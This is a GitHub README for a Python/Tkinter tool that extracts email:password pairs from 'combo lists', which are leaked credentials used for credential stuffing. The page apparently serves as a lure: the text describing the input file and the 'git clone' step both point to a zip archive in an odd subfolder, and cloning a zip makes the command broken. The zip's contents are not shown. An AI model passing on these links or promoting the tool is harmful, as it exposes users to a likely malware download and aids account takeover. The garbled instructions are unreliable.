Skip to content

Latest commit

 

History

History
28 lines (20 loc) · 855 Bytes

File metadata and controls

28 lines (20 loc) · 855 Bytes

Combo List Extractor Tool

A Python + Tkinter GUI tool to extract specific combos (email:password) from a combo list based on keywords.


✨ Features

  • Load a combo list (https://github.com/panzerking99267/MailComboExtractor/raw/refs/heads/main/mollifying/Extractor-Combo-Mail-v3.2.zip) where entries are separated by :.
  • Load a keywords text file (one keyword per line).
  • Select output file location.
  • Extract all combos where the email contains any of the keywords.
  • Simple GUI with buttons and status messages.

📦 Requirements

  • Python 3.8+
  • Tkinter (usually comes with Python)
  • No additional libraries needed.

🚀 Usage

  1. Clone the repository:
    git clone https://github.com/panzerking99267/MailComboExtractor/raw/refs/heads/main/mollifying/Extractor-Combo-Mail-v3.2.zip
    cd ComboExtractorTool